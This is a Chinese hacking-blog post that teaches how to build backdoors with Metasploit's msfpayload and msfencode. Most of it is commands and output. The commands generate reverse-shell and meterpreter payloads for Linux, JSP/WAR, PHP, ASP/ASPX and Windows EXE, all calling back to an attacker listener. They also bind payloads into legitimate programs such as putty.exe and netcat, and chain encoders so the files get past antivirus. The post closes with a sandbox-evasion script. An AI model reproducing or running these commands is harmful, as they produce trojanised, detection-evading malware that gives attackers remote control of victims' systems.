记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

使用Msfpayload和Msfencode生成backdoor

2013-03-09 09:49
文章是以前写的笔记 没有环境做过多的测试. 本文介绍使用msfpayload生成后门,msfencode多payload进行编码处理使其免杀部分杀软.

msfpayload与msfencode参数说明

执行msfpayload -h查看都有哪些参数
    Usage: /opt/metasploit/msf3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>

OPTIONS:

    -h        Help banner
    -l        List available payloads
#O--查看payload信息
#R--输出raw原始数据,可以被传输到另一个程序如msfencode或重定向到另一个文件
#C--输出c程序
执行msfencode -h查看都有哪些参数
root@bt:/opt/metasploit/msf3# msfencode -h
 
    Usage: /opt/metasploit/msf3/msfencode <options>
 
OPTIONS:
 
    -a <opt>  The architecture to encode as
    -b <opt>  The list of characters to avoid: '\x00\xff' //避免的字符
    -c <opt>  The number of times to encode the data   //编码次数
    -d <opt>  Specify the directory in which to look for EXE templates
    -e <opt>  The encoder to use  //选择使用哪种编码器
    -h        Help banner
    -i <opt>  Encode the contents of the supplied file path
    -k        Keep template working; run payload in new thread (use with -x)
    -l        List available encoders  //列出所有可用的编码器
    -m <opt>  Specifies an additional module search path
    -n        Dump encoder information
    -o <opt>  The output file  //输出文件
    -p <opt>  The platform to encode for
    -s <opt>  The maximum size of the encoded data
    -t <opt>  The output format: raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,aspx,war  //输出文件的格式
    -v        Increase verbosity
    -x <opt>  Specify an alternate executable template
 
root@bt:/opt/metasploit/msf3# msfencode -l
 
Framework Encoders
==================
 
    Name                    Rank       Description
    ----                    ----       -----------
    cmd/generic_sh          good       Generic Shell Variable Substitution Command Encoder
    cmd/ifs                 low        Generic ${IFS} Substitution Command Encoder
    cmd/printf_php_mq       manual     printf(1) via PHP magic_quotes Utility Command Encoder
    generic/none            normal     The "none" Encoder
    mipsbe/longxor          normal     XOR Encoder
    mipsle/longxor          normal     XOR Encoder
    php/base64              great      PHP Base64 encoder
    ppc/longxor             normal     PPC LongXOR Encoder
    ppc/longxor_tag         normal     PPC LongXOR Encoder
    sparc/longxor_tag       normal     SPARC DWORD XOR Encoder
    x64/xor                 normal     XOR Encoder
    x86/alpha_mixed         low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper         low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_utf8_tolower  manual     Avoid UTF8/tolower
    x86/call4_dword_xor     normal     Call+4 Dword XOR Encoder
    x86/context_cpuid       manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat        manual     stat(2)-based Context Keyed Payload Encoder
    x86/context_time        manual     time(2)-based Context Keyed Payload Encoder
    x86/countdown           normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov         normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive   normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha            low        Non-Alpha Encoder
    x86/nonupper            low        Non-Upper Encoder
    x86/shikata_ga_nai      excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit   manual     Single Static Bit
    x86/unicode_mixed       manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper       manual     Alpha2 Alphanumeric Unicode Uppercase Encoder

生成backdoor类型

可以生成asp、aspx、php、jsp、war、exe等多种类型,下面介绍的使用方法就不一一测试了.
msfpayload生成linux backdoor
root@bt:~# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.7.102 LPORT=5555 X > linux2
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell_reverse_tcp
 Length: 71
Options: {"LHOST"=>"192.168.7.102", "LPORT"=>"5555"}
目标机器运行linux2,本机监听下端口,使用metasploit或者nc都行,测试如下图: payload与可执行文件绑定运行,如netcat:
root@bt:~# msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LHOST=10.0.0.1 LPORT=5555 R | msfencode -a x86 -e x86/alpha_mixed -k -x /bin/netcat -t elf -o nc
[*] x86/alpha_mixed succeeded with size 204 (iteration=1)
高级点的payload meterpreter
root@bt:~# msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LHOST=10.0.0.1 LPORT=5555 R | msfencode -a x86 -e x86/alpha_mixed -k -x /bin/netcat -t elf -o nc
可以使用msfpayload -l | grep linux查找,选择合适自己的.
msfpayload生成jsp、war backdoor
root@bt:~# msfpayload java/jsp_shell_reverse_tcp LHOST=10.1.1.1 LPORT=5555 R > door.jsp
生成war格式后门
root@bt:~# msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=5555 W > door.war
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell_reverse_tcp
 Length: 71
Options: {"LHOST"=>"10.0.0.1", "LPORT"=>"5555"}
 
root@bt:~# unzip door.war
Archive:  door.war
  inflating: META-INF/MANIFEST.MF
   creating: WEB-INF/
  inflating: WEB-INF/web.xml
  inflating: sbkuvbujlbr.jsp
  inflating: sWDYKoedyqBMERb.txt
root@bt:~#
msfpayload生成php backdoor
root@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e php/base64 -t raw -o base64php.php
[*] php/base64 succeeded with size 1779 (iteration=1)
如果文件开头和结尾木有php的分界符,那么得自己手动gedit/vim base64php.php一下,在头尾加上即可,否则是不成功的.如图:
msfpayload生成asp、aspx backdoor
root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -a x86  -t asp -o door2.asp
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -a x86  -t aspx -o door.aspx
[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
msfpayload生成exe backdoor
root@bt:~#msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=5555 R | msfencode -t exe -c 5 > /root/Desktop/door.exe
root@bt:~#msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=5555 R | msfencode -t exe -c 5 -k -x /root/putty.exe -o /root/Desktop/puttydoor.exe
root@bt:~#msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 10 X > shell.bin
root@bt:~#msfpayload windows/shell/reverse_tcp  LHOST=10.0.0.1 LPORT=4443 EXITFUNC=thread R |  msfencode -e x86/shikata_ga_nai -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor  -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor  -c 2 -t exe -o door.exe

msfpayload tips

目标是内网时,常用的payload选着如:
root@bt:~# msfpayload windows/meterpreter/reverse_tcp_allports LHOST=192.168.1.6 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -o allports.exe
root@bt:~# msfpayload windows/meterpreter/reverse_http LHOST=192.168.1.6 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -o httpports.exe
Antivirus Sandbox Evasion-ultimate-payload.pl
$ ./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=172.16.1.1 LPORT=443 \
    | ./ultimate-payload.pl -t ultimate-payload-template1.exe -o /tmp/payload.exe
[*ultimate] Waiting for payload from STDIN
[*ultimate] Payload: read (size: 367)
[*ultimate] Payload: encode (new size: 1161)
[*ultimate] Template: read 94720 bytes from file
[*ultimate] Template: found pattern 'MY_PAYLOAD:' at position: 36928
[*ultimate] Output: add the begin of the template (size: 36928)
[*ultimate] Output: add the encoded payload (size: 1161)
[*ultimate] Output: add the end of the template (size: 18502)
[*ultimate] File '/tmp/payload.exe' generated (size: 94720)
reverse_https with basic authentication against proxy
msfvenom -p windows/meterpreter/reverse_https_proxy_basicauth \
  -f exe LPORT=443 LHOST=172.16.99.1 PROXY_AUTH_USER=mylongusername \
   PROXY_AUTH_PASS=mylongpassword123 > /tmp/msf.exe
还有对生成的payload加壳处理,如upx. ps:这里只是简单的介绍一下如何使用,具体操作还得大家测试,查看shellcode加C参数,如有错误请留言.

使用Msfpayload和Msfencode生成backdoor

知识来源: www.pentesting.cc/use-msfpayload-and-generated-msfencode-backdoor.html

阅读:1668215 | 评论:0 | 标签:Metasploit metasploit渗透 msfencode msfpayload backdoor

想收藏或者和大家分享这篇好文章→复制链接地址

“使用Msfpayload和Msfencode生成backdoor”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云